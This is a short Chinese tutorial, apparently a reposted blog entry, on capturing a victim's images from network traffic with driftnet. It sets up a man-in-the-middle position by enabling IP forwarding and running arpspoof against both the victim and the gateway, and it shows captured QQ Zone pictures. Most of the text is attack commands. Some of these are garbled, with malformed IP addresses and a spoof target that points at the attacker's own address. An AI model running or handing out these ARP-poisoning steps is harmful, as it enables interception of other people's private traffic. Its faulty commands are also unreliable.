driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片
环境
受害ip:192.168.228.130
攻击ip:192.168.228.129
网关:192.168.228.2
条件
1,开启或关闭IP转发
2,向被攻击机器发送arp欺骗数据包,冒充网关
3,向网关发送arp数据欺骗网关,冒充被攻击机器
4,运行driftnet截取图片
开启IP转发功能
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
重定向受害者的流量传送给攻击者
arpspoof -t 192.168.130 168.168.228.2 -i eth0
使网关的数据重定向到攻击者的机器。(流量由网关到攻击者再到受攻击者)
arpspoof -t 168.168.228.2 192.168.228.129 -i eth0
监听
driftnet -i eth0
抓到的QQ空间图片-^^-
转自:https://www.cnblogs.com/hackxf/p/9563438.html